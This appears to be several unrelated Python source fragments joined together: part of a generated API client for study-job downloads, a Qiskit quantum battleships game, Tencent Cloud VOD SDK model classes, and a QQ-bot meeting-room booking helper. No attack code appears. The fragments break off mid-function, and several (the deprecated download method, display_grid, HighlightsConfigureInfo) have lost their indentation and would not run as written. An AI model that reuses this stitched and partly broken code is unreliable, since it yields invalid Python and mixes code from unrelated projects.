        raise ApiValueError("Missing the required parameter `expiry` when calling `study_get_study_job_download`")  # noqa: E501

    collection_formats = {}

    # Map snake_case locals onto the camelCase placeholders of the URL
    # template used in the call_api() invocation below.
    path_params = {}
    if 'tenant_id' in local_var_params:
        path_params['tenantId'] = local_var_params['tenant_id']  # noqa: E501
    if 'study_id' in local_var_params:
        path_params['studyId'] = local_var_params['study_id']  # noqa: E501
    if 'job_id' in local_var_params:
        path_params['jobId'] = local_var_params['job_id']  # noqa: E501

    # Query string: required signature/expiry plus the optional filters,
    # each sent only when a non-None value was supplied.
    query_params = []
    if 'access_signature' in local_var_params and local_var_params['access_signature'] is not None:  # noqa: E501
        query_params.append(('accessSignature', local_var_params['access_signature']))  # noqa: E501
    if 'expiry' in local_var_params and local_var_params['expiry'] is not None:  # noqa: E501
        query_params.append(('expiry', local_var_params['expiry']))  # noqa: E501
    if 'file_name' in local_var_params and local_var_params['file_name'] is not None:  # noqa: E501
        query_params.append(('fileName', local_var_params['file_name']))  # noqa: E501
    if 'channels_as_csv' in local_var_params and local_var_params['channels_as_csv'] is not None:  # noqa: E501
        query_params.append(('channelsAsCsv', local_var_params['channels_as_csv']))  # noqa: E501
    if 'sim_type_channels' in local_var_params and local_var_params['sim_type_channels'] is not None:  # noqa: E501
        query_params.append(('simTypeChannels', local_var_params['sim_type_channels']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json', 'text/json', 'application/xml', 'text/xml'])  # noqa: E501

    # Authentication setting: empty — presumably the accessSignature/expiry
    # query parameters carry the authorization for this endpoint (confirm).
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/studies/{tenantId}/{studyId}/jobs/{jobId}/download', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def study_get_study_job_download_deprecated(self, tenant_id, user_id, study_id, job_id, access_signature, expiry, **kwargs): # noqa: E501
"""study_get_study_job_download_deprecated # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.study_get_study_job_download_deprecated(tenant_id, user_id, study_id, job_id, access_signature, expiry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str tenant_id: (required)
:param str user_id: (required)
:param str study_id: (required)
:param str job_id: (required)
:param str access_signature: | |
from qiskit import Aer, IBMQ, QuantumRegister, ClassicalRegister, QuantumCircuit, execute
import getpass, random, numpy, math
def title_screen():
    """Print the game's banner art and wait for the player to press Enter.

    Purely cosmetic: writes the title to stdout and blocks on input().
    Returns nothing.
    """
    print("\n\n\n\n\n\n\n\n")
    print("            ██████╗ ██╗   ██╗ █████╗ ███╗   ██╗████████╗██╗   ██╗███╗   ███╗  ")
    print("           ██╔═══██╗██║   ██║██╔══██╗████╗  ██║╚══██╔══╝██║   ██║████╗ ████║  ")
    print("           ██║   ██║██║   ██║███████║██╔██╗ ██║   ██║   ██║   ██║██╔████╔██║  ")
    print("           ██║▄▄ ██║██║   ██║██╔══██║██║╚██╗██║   ██║   ██║   ██║██║╚██╔╝██║  ")
    print("           ╚██████╔╝╚██████╔╝██║  ██║██║ ╚████║   ██║   ╚██████╔╝██║ ╚═╝ ██║  ")
    print("            ╚══▀▀═╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝    ╚═════╝ ╚═╝     ╚═╝  ")
    print("")
    print("   ██████╗  █████╗ ████████╗████████╗██╗     ███████╗███████╗██╗  ██╗██║██████╗ ███████╗")
    print("   ██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║     ██╔════╝██╔════╝██║  ██║██║██╔══██╗██╔════╝")
    print("   ██████╔╝███████║   ██║      ██║   ██║     █████╗  ███████╗███████║██║██████╔╝███████╗")
    print("   ██╔══██╗██╔══██║   ██║      ██║   ██║     ██╔══╝  ╚════██║██╔══██║██║██╔═══╝ ╚════██║")
    print("   ██████╔╝██║  ██║   ██║      ██║   ███████╗███████╗███████║██║  ██║██║██║     ███████║")
    print("   ╚═════╝ ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚═╝     ╚══════╝")
    print("")
    print("                        ___            ___                 _                  ")
    print(r'                       | _ )_  _      |   \ ___ __ ___  __| |___ _  _         ')
    print(r'                       | _ \ || |     | |) / -_/ _/ _ \/ _` / -_| || |        ')
    print(r'                       |___/\_, |     |___/\___\__\___/\__,_\___|\_,_|        ')
    print("                            |__/                                              ")
    print("")
    print("                       A game played on a real quantum computer!")
    print("")
    print("")
    # Bug fix: the original called .upper() on the discarded input() result,
    # a dead expression that suggested the value mattered. It does not; we
    # only wait for Enter.
    input("> Press Enter to play...\n")
def play_game():
    """Run one full game of quantum battleships.

    Sets up the board for both players, then loops: collect one bomb from
    each player, encode the accumulated bombings as partial-NOT rotations
    on a 5-qubit circuit per player, run both circuits, and show the
    resulting damage until display_grid() reports the game is over.
    """
    # the game variable will be set to False once the game is over
    game = True

    # bomb[X][Y] holds the number of times position Y has been bombed by player X+1
    bomb = [[0]*5 for _ in range(2)]  # all values are initialized to zero

    # number of circuit samples used for the damage statistics
    shots = 1024

    # grid[player] will hold the measurement counts for the grid of each player
    grid = [{}, {}]

    # ask what kind of quantum device will be used (real or simulated)
    device = ask_for_device()

    # ask players where their ships are
    shipPos = ask_for_ships()

    while (game):
        # ask both players where they want to bomb, and update the list of bombings so far
        bomb = ask_for_bombs(bomb)

        # create the quantum programs that implement the bombings on each player's grid
        qc = []
        for player in range(2):
            # set up registers and circuit for this player's 5-position grid
            q = QuantumRegister(5)
            c = ClassicalRegister(5)
            qc.append(QuantumCircuit(q, c))

            # add the bombs (of the opposing player)
            for position in range(5):
                # add as many bombs as have been placed at this position
                for _ in range(bomb[(player+1)%2][position]):
                    # the effectiveness of each bomb (the fraction of a NOT
                    # applied) depends on which ship sits there: ship k
                    # takes a pi/(k+1) rotation, so bigger ships need more hits
                    for ship in [0,1,2]:
                        if (position == shipPos[player][ship]):
                            frac = 1/(ship+1)
                            # NOTE(review): u3 is the legacy qiskit rotation API —
                            # confirm the installed qiskit version still provides it
                            qc[player].u3(frac * math.pi, 0.0, 0.0, q[position])

            # finally, measure every position into its classical bit
            for position in range(5):
                qc[player].measure(q[position], c[position])

        # compile and run both players' circuits as a single job
        job = execute(qc, backend=device, shots=shots)
        if not device.configuration().to_dict()['simulator']:
            print("\nWe've now submitted the job to the quantum computer to see what happens to the ships of each player\n(it might take a while).\n")
        else:
            print("\nWe've now submitted the job to the simulator to see what happens to the ships of each player.\n")

        # extract the measurement counts for each player's circuit
        for player in range(2):
            grid[player] = job.result().get_counts(qc[player])

        print(grid)

        # display_grid returns False once a player's ships are all destroyed
        game = display_grid(grid, shipPos, shots)
def ask_for_device():
    """Ask whether to run on real quantum hardware or a local simulator.

    Returns:
        The selected qiskit backend: the 5-qubit IBM Q Tenerife device
        when the player answers 'y', otherwise the local QASM simulator.
    """
    wants_real = input("Do you want to play on the real device? (y/n)\n").upper() == "Y"
    if wants_real:
        # Real hardware: the 5-qubit ibmqx4 (Tenerife) device.
        return IBMQ.get_backend('ibmq_5_tenerife')
    # Any other answer falls back to the local simulator.
    return Aer.get_backend('qasm_simulator')
def ask_for_ships():
    """Collect three ship positions (0-4) for each of the two players.

    Positions are entered via getpass so the opponent cannot see them.
    Hidden feature: typing 'R' at the initial prompt places every ship
    randomly instead of asking.

    Returns:
        list: ship_positions[player][ship] is the grid position of that
        ship (each player's three positions are distinct).
    """
    # This looks like a plain 'press Enter' prompt, but 'R' triggers
    # random placement for both players.
    rand_place = input("> Press Enter to start placing ships...\n").upper()

    # -1 marks a position that has not been chosen yet.
    ship_positions = [[-1]*3 for _ in range(2)]

    for player in [0, 1]:
        if rand_place == "R":
            # Three distinct random positions out of the five available.
            for ship, pos in enumerate(random.sample(range(5), 3)):
                ship_positions[player][ship] = pos
            #print(randPos) #uncomment if you want a sneaky peek at where the ships are
            continue
        for ship in [0, 1, 2]:
            # Keep prompting until this ship lands on a valid, unused spot;
            # a successful assignment replaces the -1 sentinel and ends the loop.
            while ship_positions[player][ship] == -1:
                entry = getpass.getpass("Player " + str(player+1) + ", choose a position for ship " + str(ship+1) + " (0, 1, 2, 3 or 4)\n")
                if not entry.isdigit():  # valid answers have to be integers
                    print("\nThat's not a valid position. Try again.\n")
                    continue
                pos = int(entry)
                if pos in [0, 1, 2, 3, 4] and pos not in ship_positions[player]:
                    ship_positions[player][ship] = pos
                    print("\n")
                elif pos in ship_positions[player]:
                    print("\nYou already have a ship there. Try again.\n")
                else:
                    print("\nThat's not a valid position. Try again.\n")
    return ship_positions
def ask_for_bombs(bomb):
    """Ask each player for one bombing position and update the tally.

    Args:
        bomb: bomb[player][position] counts how many times that position
            has been bombed by player+1 so far; the chosen cell is
            incremented in place.

    Returns:
        list: the updated bomb tally (the same object that was passed in).
    """
    input("> Press Enter to place some bombs...\n")

    for player in range(2):
        print("\n\nIt's now Player " + str(player+1) + "'s turn.\n")

        # Re-prompt until the player supplies a digit in the range 0..4.
        while True:
            entry = input("Choose a position to bomb (0, 1, 2, 3 or 4)\n")
            if entry.isdigit() and int(entry) in range(5):
                bomb[player][int(entry)] += 1
                print("\n")
                break
            print("\nThat's not a valid position. Try again.\n")

    return bomb
def display_grid ( grid, shipPos, shots ):
# since this function has been called, the game must still be on
game = True
# look at the damage on all qubits (we'll even do ones with no ships)
damage = [ [0]*5 for _ in range(2)] # this will hold the prob of a 1 for each qubit for each player
# for this we loop over all strings of 5 bits for each player
for player in range(2):
for bitString in grid[player].keys():
# and then over all positions
for position in range(5):
# if the string has a 1 at that position, we add a contribution to the damage
# remember that the bit for position 0 is the rightmost one, and so at bitString[4]
if (bitString[4-position]=="1"):
damage[player][position] += grid[player][bitString]/shots
# give results to players
for player in [0,1]:
input("\nPress Enter to see the results for Player " + str(player+1) + "'s ships...\n")
# report damage for qubits that are ships, and which have significant damage
# ideally this would be non-zero damage, but noise means it can happen for ships that haven't been hit
# so we choose 5% as the threshold
display = [" ? "]*5
# loop over all qubits that are ships
for position in shipPos[player]:
# if the damage is high enough, display the damage
if ( damage[player][position] > 0.1 ):
if (damage[player][position]>0.9):
display[position] = "100%"
else:
display[position] = str(int( 100*damage[player][position] )) + "% "
#print(position,damage[player][position])
print("Here is the percentage damage for ships that have been bombed.\n")
print(display[ 4 ] + " " + display[ 0 ])
print(r' |\ /|')
print(r' | \ / |')
print(r' | \ / |')
print(" | " + display[ 2 ] + " |")
print(r' | | |
= None
self.ConcatCompleteEvent = None
self.SnapshotByTimeOffsetCompleteEvent = None
self.WechatPublishCompleteEvent = None
self.WechatMiniProgramPublishCompleteEvent = None
def _deserialize(self, params):
    """Populate this event object from a raw API response dict.

    Scalar fields are copied directly. Each optional event payload, when
    present in ``params``, is deserialized into its dedicated task model
    and stored on the attribute of the same name. Unrecognized keys only
    trigger a warning so that newer server responses do not break older
    SDK versions.

    :param params: dict decoded from the API response.
    """
    self.EventHandle = params.get("EventHandle")
    self.EventType = params.get("EventType")
    # Table-driven replacement for fourteen copy-pasted if-blocks:
    # response key -> model class that parses its payload.
    event_models = (
        ("FileUploadEvent", FileUploadTask),
        ("ProcedureStateChangeEvent", ProcedureTask),
        ("FileDeleteEvent", FileDeleteTask),
        ("PullCompleteEvent", PullUploadTask),
        ("EditMediaCompleteEvent", EditMediaTask),
        ("SplitMediaCompleteEvent", SplitMediaTask),
        ("ComposeMediaCompleteEvent", ComposeMediaTask),
        ("ClipCompleteEvent", ClipTask2017),
        ("TranscodeCompleteEvent", TranscodeTask2017),
        ("CreateImageSpriteCompleteEvent", CreateImageSpriteTask2017),
        ("ConcatCompleteEvent", ConcatTask2017),
        ("SnapshotByTimeOffsetCompleteEvent", SnapshotByTimeOffsetTask2017),
        ("WechatPublishCompleteEvent", WechatPublishTask),
        ("WechatMiniProgramPublishCompleteEvent", WechatMiniProgramPublishTask),
    )
    for name, model_cls in event_models:
        if params.get(name) is not None:
            obj = model_cls()
            obj._deserialize(params.get(name))
            setattr(self, name, obj)
    # Warn (once, with the full list) about keys the model does not declare.
    memeber_set = set(params.keys())
    for name, value in vars(self).items():
        if name in memeber_set:
            memeber_set.remove(name)
    if len(memeber_set) > 0:
        # "fileds" typo kept byte-for-byte for parity with the rest of the
        # generated SDK's warning message.
        warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ExecuteFunctionRequest(AbstractModel):
    """ExecuteFunction request payload.

    Carries the name and opaque argument string of a backend function to
    invoke through the VOD ExecuteFunction API.
    """

    def __init__(self):
        """
        :param FunctionName: Name of the backend API function to invoke.
        :type FunctionName: str
        :param FunctionArg: Function argument; the exact format is agreed with the backend per call.
        :type FunctionArg: str
        :param SessionContext: Source context used to pass through caller request information; task-flow status-change callbacks return this value unchanged. Up to 1,000 characters.
        :type SessionContext: str
        :param SessionId: Deduplication token: if a request with the same token was made within the last seven days, this request returns an error. Up to 50 characters; omit or pass an empty string to disable deduplication.
        :type SessionId: str
        :param ExtInfo: Reserved field for special-purpose use.
        :type ExtInfo: str
        :param SubAppId: VOD [subapplication](/document/product/266/14574) ID. Fill in when accessing resources of a subapplication; otherwise leave unset.
        :type SubAppId: int
        """
        self.FunctionName = None
        self.FunctionArg = None
        self.SessionContext = None
        self.SessionId = None
        self.ExtInfo = None
        self.SubAppId = None

    def _deserialize(self, params):
        """Populate the request fields from a raw dict."""
        self.FunctionName = params.get("FunctionName")
        self.FunctionArg = params.get("FunctionArg")
        self.SessionContext = params.get("SessionContext")
        self.SessionId = params.get("SessionId")
        self.ExtInfo = params.get("ExtInfo")
        self.SubAppId = params.get("SubAppId")
        # Warn about any keys this model does not declare (forward compat).
        memeber_set = set(params.keys())
        for name, value in vars(self).items():
            if name in memeber_set:
                memeber_set.remove(name)
        if len(memeber_set) > 0:
            warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ExecuteFunctionResponse(AbstractModel):
    """ExecuteFunction response payload."""

    def __init__(self):
        """
        :param Result: Packed string of the processing result; the exact format is agreed with the backend.
        :type Result: str
        :param RequestId: Unique request ID returned with every response; supply it when reporting an issue with this request.
        :type RequestId: str
        """
        self.Result = None
        self.RequestId = None

    def _deserialize(self, params):
        """Populate the response fields from a raw dict."""
        self.Result = params.get("Result")
        self.RequestId = params.get("RequestId")
class FaceConfigureInfo(AbstractModel):
    """Control parameters for the face recognition task."""

    def __init__(self):
        """
        :param Switch: Face recognition task switch. Valid values:
<li>ON: enable the intelligent face recognition task;</li>
<li>OFF: disable the intelligent face recognition task.</li>
        :type Switch: str
        :param Score: Face recognition filter score; only results scoring at or above this value are returned. Defaults to 95. Value range: 0 - 100.
        :type Score: float
        :param DefaultLibraryLabelSet: Filter labels for the default figure library, specifying which default figures to return. If unset or empty, all default-figure results are returned. Valid label values:
<li>entertainment: entertainment celebrity;</li>
<li>sport: sports celebrity;</li>
<li>politician: political figure.</li>
        :type DefaultLibraryLabelSet: list of str
        :param UserDefineLibraryLabelSet: Filter labels for user-defined figures, specifying which custom figures to return. If unset or empty, all custom-figure results are returned.
Up to 100 labels, each at most 16 characters.
        :type UserDefineLibraryLabelSet: list of str
        :param FaceLibrary: Figure library selection. Valid values:
<li>Default: use the default figure library;</li>
<li>UserDefine: use the user-defined figure library;</li>
<li>All: use both the default and the user-defined figure libraries.</li>
Defaults to All (both libraries).
        :type FaceLibrary: str
        """
        self.Switch = None
        self.Score = None
        self.DefaultLibraryLabelSet = None
        self.UserDefineLibraryLabelSet = None
        self.FaceLibrary = None

    def _deserialize(self, params):
        """Populate the configuration fields from a raw dict."""
        self.Switch = params.get("Switch")
        self.Score = params.get("Score")
        self.DefaultLibraryLabelSet = params.get("DefaultLibraryLabelSet")
        self.UserDefineLibraryLabelSet = params.get("UserDefineLibraryLabelSet")
        self.FaceLibrary = params.get("FaceLibrary")
        # Warn about any keys this model does not declare (forward compat).
        memeber_set = set(params.keys())
        for name, value in vars(self).items():
            if name in memeber_set:
                memeber_set.remove(name)
        if len(memeber_set) > 0:
            warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class FaceConfigureInfoForUpdate(AbstractModel):
    """Control parameters for updating the face-recognition task."""

    def __init__(self):
        self.Switch = None  # "ON"/"OFF": enable or disable the task
        self.Score = None  # min score (0-100) for a match to be reported
        self.DefaultLibraryLabelSet = None  # filter labels for the built-in library
        self.UserDefineLibraryLabelSet = None  # filter labels for the user library (<= 100, 16 chars each)
        self.FaceLibrary = None  # "Default" / "UserDefine" / "All"

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        for field in ("Switch", "Score", "DefaultLibraryLabelSet",
                      "UserDefineLibraryLabelSet", "FaceLibrary"):
            setattr(self, field, params.get(field))
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class FileDeleteTask(AbstractModel):
    """File deletion task."""

    def __init__(self):
        self.FileIdSet = None  # list of file IDs to delete

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.FileIdSet = params.get("FileIdSet")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class FileUploadTask(AbstractModel):
    """Information about a completed file-upload task."""

    def __init__(self):
        self.FileId = None  # unique ID of the uploaded file
        self.MediaBasicInfo = None  # basic media info generated after upload
        self.ProcedureTaskId = None  # task-flow ID when a procedure was requested at upload
        self.MetaData = None  # media metadata (size, duration, streams); may be None

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.FileId = params.get("FileId")
        basic = params.get("MediaBasicInfo")
        if basic is not None:
            self.MediaBasicInfo = MediaBasicInfo()
            self.MediaBasicInfo._deserialize(basic)
        self.ProcedureTaskId = params.get("ProcedureTaskId")
        meta = params.get("MetaData")
        if meta is not None:
            self.MetaData = MediaMetaData()
            self.MetaData._deserialize(meta)
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class ForbidMediaDistributionRequest(AbstractModel):
    """Request parameters for the ForbidMediaDistribution API."""

    def __init__(self):
        self.FileIds = None  # media file IDs, at most 20 per call
        self.Operation = None  # "forbid" to block distribution, "recover" to unblock
        self.SubAppId = None  # VOD subapplication ID; omit for the main application

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        for field in ("FileIds", "Operation", "SubAppId"):
            setattr(self, field, params.get(field))
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class ForbidMediaDistributionResponse(AbstractModel):
    """Response parameters for the ForbidMediaDistribution API."""

    def __init__(self):
        self.NotExistFileIdSet = None  # file IDs that did not exist
        self.RequestId = None  # unique request ID, returned on every call

    def _deserialize(self, params):
        """Populate attributes from *params*."""
        self.NotExistFileIdSet = params.get("NotExistFileIdSet")
        self.RequestId = params.get("RequestId")
class FrameTagConfigureInfo(AbstractModel):
    """Control parameters for the intelligent per-frame tagging task."""

    def __init__(self):
        self.Switch = None  # "ON"/"OFF": enable or disable the task
        self.ScreenshotInterval = None  # sampling interval in seconds (>= 0.5; default 1)

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.Switch = params.get("Switch")
        self.ScreenshotInterval = params.get("ScreenshotInterval")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class FrameTagConfigureInfoForUpdate(AbstractModel):
    """Control parameters for updating the per-frame tagging task."""

    def __init__(self):
        self.Switch = None  # "ON"/"OFF": enable or disable the task
        self.ScreenshotInterval = None  # sampling interval in seconds (>= 0.5)

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.Switch = params.get("Switch")
        self.ScreenshotInterval = params.get("ScreenshotInterval")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HeadTailConfigureInfo(AbstractModel):
    """Control parameters for the intro/outro (head & tail) recognition task."""

    def __init__(self):
        self.Switch = None  # "ON"/"OFF": enable or disable the task

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.Switch = params.get("Switch")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HeadTailConfigureInfoForUpdate(AbstractModel):
    """Control parameters for updating the intro/outro recognition task."""

    def __init__(self):
        self.Switch = None  # "ON"/"OFF": enable or disable the task

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.Switch = params.get("Switch")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HeadTailTaskInput(AbstractModel):
    """Input for an intro/outro (head & tail) task."""

    def __init__(self):
        self.Definition = None  # head/tail template ID

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        self.Definition = params.get("Definition")
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HeadTailTemplate(AbstractModel):
    """Details of an intro/outro (head & tail) template."""

    def __init__(self):
        self.Definition = None  # template ID
        self.Name = None  # template name (<= 64 chars)
        self.Comment = None  # template description (<= 256 chars)
        self.HeadCandidateSet = None  # intro candidates (<= 5); closest resolution wins
        self.TailCandidateSet = None  # outro candidates (<= 5); closest resolution wins
        self.FillType = None  # "stretch" / "gauss" / "white" / "black" (default "stretch")

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        for field in ("Definition", "Name", "Comment", "HeadCandidateSet",
                      "TailCandidateSet", "FillType"):
            setattr(self, field, params.get(field))
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HighlightSegmentItem(AbstractModel):
    """One segment of an intelligent highlight reel."""

    def __init__(self):
        self.Confidence = None  # confidence score of the segment
        self.StartTimeOffset = None  # segment start offset (seconds)
        self.EndTimeOffset = None  # segment end offset (seconds)

    def _deserialize(self, params):
        """Populate attributes from *params*, warning about unrecognized keys."""
        for field in ("Confidence", "StartTimeOffset", "EndTimeOffset"):
            setattr(self, field, params.get(field))
        leftover = set(params.keys()) - set(vars(self))
        if leftover:
            warnings.warn("%s fileds are useless." % ",".join(leftover))
class HighlightsConfigureInfo(AbstractModel):
"""智能精彩片段任务控制参数
"""
def __init__(self):
"""
:param Switch: 智能精彩片段任务开关,可选值:
<li>ON:开启智能精彩片段任务;</li>
<li>OFF:关闭智能精彩片段任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
| |
<filename>ch/meeting_tools.py<gh_stars>0
"""
这个文件应该放在全局可以import的位置供xl.py调用
比如说现在我的D:/anaconda/Lib
(xl.py按照要求放在了C:/Users/c2534/.qqbot-tmp/plugins)
有时候(脚本运行后修改这个文件)这个文件会不起作用,手动重启qqbot用命令 qq fresh-restart扫码
"""
import datetime
from openpyxl import load_workbook, Workbook
import os
import re
# todo 规范一下好
def botreply(bot, contact, member, s):
    """Reply in the group via the bot; currently a disabled placeholder.

    The intended behavior (per the commented-out code): prefix replies with
    a marker so the bot can recognize and ignore its own messages.
    """
    # if s starts with the bot-reply marker: return (avoid echo loops)
    # TODO: distinguish whether the target is a contact or a group member
    # bot.SendTo(contact, "机器人回复 \n"+s)
    pass
def ask_info(file, dates):
    """Collect all booking entries recorded for a given date.

    :param file: workbook file name (with extension)
    :param dates: date string like '2018-04-02'
    :return: list of distinct entry strings; ['无记录'] when nothing was found
    """
    wb = get_excel_file(file)
    # month sheet is selected by the first 7 chars of the date ('YYYY-MM')
    sheet = get_excel_sheet(dates, wb)
    results = ['无记录']
    # locate the row holding the bare date
    date_row = -1
    for r in range(1, sheet.max_row + 1):
        if sheet.cell(row=r, column=1).value == dates:
            date_row = r
            break
    if date_row == -1:
        return results
    # one day spans 52 quarter-hour rows: 8:00-20:45 = 12*4+4
    span = 52
    for col in range(2, sheet.max_column + 1):
        for row in range(date_row + 1, date_row + span + 1):
            cell_value = sheet.cell(row=row, column=col).value
            if cell_value is None or cell_value in results:
                continue
            results.append(str(cell_value))
    wb.close()
    if len(results) > 1:
        # drop the '无记录' placeholder once real entries exist
        results[:] = results[1:]
    return results
def my_watch_group(contact, group_name):
    """Return True when the contact's nickname occurs inside *group_name*."""
    return group_name.find(contact.nick) != -1
# todo 考虑使用redis json存储规则
# 但因为是py脚本运行 随时可以修改代码 需求不强烈
def dialog_clearify(content):
    """Normalize a chat message before it is parsed for room/time/date.

    Replaces full-width punctuation, Chinese numerals and colloquial time
    words with a canonical ASCII form (e.g. '点半' -> ':30', '全天' ->
    '8:30-18:00'), then rewrites afternoon times given on a 12-hour clock
    ('5:30-6:00') into 24-hour form ('17:30-18:00') and fills in missing
    minutes on a bare start hour ('9-10:30' -> '9:00-10:30').

    The order of entries in the replacement table matters - do not reorder.

    :param content: raw message text; non-str input yields ''.
    :return: normalized text.
    """
    if not isinstance(content, str):
        return ""
    d = content
    clearify_dict = {'~~~': '-', "~~": "-", ' ': ' ',
                     '~~': '-', '~': '-', '---': '-',
                     '--': '-', '——': '-', ':': ':',
                     '~': '-',
                     '全天': '8:30-18:00',
                     '12楼': '12层', '13楼': '13层', '十三楼': '13层', '十二楼': '12层',
                     '今日': '今天', '明日': '明天',
                     '合昌': '和昌', '合唱': '和昌', '和唱': '和昌',
                     '点半': ':30', '点30': ':30', '点三十': ':30',
                     '点': ':00',
                     '十一': '11', '十二': '12', '十三': '13',
                     '十四': '14', '十五': '15', '十六': '16',
                     '十七': '17', '十八': '18', '十九': '19',
                     '二十': '20', '十': '10',
                     '九': '9', '八': '8', '七': '7',
                     '六': '6', '五': '5', '四': '4',
                     '三': '3', '二': '2', '一': '1',
                     '下午8:': '20:',
                     '预订': '预定',
                     '到': '-',
                     '(': '(', ')': ')',
                     ',': '.', ',': '.', '。': '.'
                     }
    for k, v in clearify_dict.items():
        d = d.replace(k, v)
    # '5:30-6:00' -> '17:30-18:00': shift a 12-hour afternoon range
    # (start hour 1-7, end hour 2-8) forward by 12 hours.
    pm_range = re.compile(r'([^0-9:-]?)([1-7])(:[0-9]{2,3}-)([2-8])(:[0-9]{2,3})')
    found = pm_range.findall(d)
    if found:
        d = pm_range.subn(
            found[0][0] + str(int(found[0][1]) + 12) + found[0][2]
            + str(int(found[0][3]) + 12) + found[0][4],
            d)[0]
    # '9-10:30' -> '9:00-10:30': add the missing ':00' to a bare start hour.
    bare_hour = re.compile(r'([^0-9:])([0-9]{1,3})(-[0-9]{1,3}:[0-9]{2,3})')
    found = bare_hour.findall(d)
    if found:
        d = bare_hour.subn(found[0][0] + found[0][1] + ':00' + found[0][2], d)[0]
    return d
def is_cmd(dialog):
    """Return *dialog* unchanged when it looks like a booking command, else ''.

    A command must mention a meeting room ('会议室') and one of the
    book/cancel verbs ('预', '订', '定'). Non-str input yields ''.
    """
    if not isinstance(dialog, str):
        return ''
    if "会议室" in dialog and ("预" in dialog or "订" in dialog or "定" in dialog):
        return dialog
    return ''
def get_meetingrooms_names():
    """Known meeting-room names; the last entry is the unknown-room fallback."""
    rooms = ['小会议室', '大会议室', '13层会议室', '【会议室名称不详】无法正确记录']
    return rooms
def find_fangjian(dialog):
    """Extract the meeting-room index from a normalized dialog string.

    Matches the floor ('12层'/'13层') and room size ('大/小会议室') with
    regexes, then maps the combined name onto get_meetingrooms_names().

    :param dialog: normalized message text
    :return: room index 0..3; 3 means the room could not be identified
    """
    rooms = get_meetingrooms_names()
    candidate = '12层大会议室'
    floors = re.findall(r'([1][23]层)', dialog)
    sizes = re.findall(r'([大小]?会议室)', dialog)
    if floors:
        if floors[0] == '13层':
            # the 13th floor currently has a single room -> index 2
            return 2
        candidate = floors[0] + candidate[3:]
    if sizes:
        candidate = candidate[:3] + sizes[0]
    for idx, name in enumerate(rooms):
        if candidate.find(name) > -1:
            return idx
    return len(rooms) - 1
def find_shijian(dialog):
    """Extract the (start, end) time pair from a normalized dialog string.

    Explicit 'H:MM' times win; otherwise '上午'/'下午' select morning or
    afternoon defaults. Hours are finally clamped into the 8-20 range.

    :return: tuple of strings, e.g. ('9:00', '10:30')
    """
    start, end = '8:30', '18:00'
    times = re.findall(r'([0-9]?[0-9])[:点:]([0-5][0-9])', dialog)
    if times:
        # start minutes round DOWN, end minutes round UP to the quarter hour
        start = times[0][0] + ':' + shijian_fenzhong_round(times[0][1])
        if len(times) >= 2:
            end = shijian_round2(times[1][0] + ':' + times[1][1])
    else:
        if dialog.find('上午') > -1:
            start, end = '8:30', '12:00'
        if dialog.find('下午') > -1:
            start, end = '14:00', '18:00'

    def clamp(t):
        # keep the hour within opening hours 8:00-20:xx
        hour = int(t[:t.find(':')])
        if hour < 8:
            return '8' + t[t.find(':'):]
        if hour > 20:
            return '20' + t[t.find(':'):]
        return t

    return clamp(start), clamp(end)
def shijian_fenzhong_round(s):
    """Round a minute string DOWN to the nearest quarter hour.

    :param s: minute string '00'..'59' (as captured by the time regex)
    :return: '00', '15', '30' or '45'
    """
    # The original had two identical '45' branches (`< 60` and the final
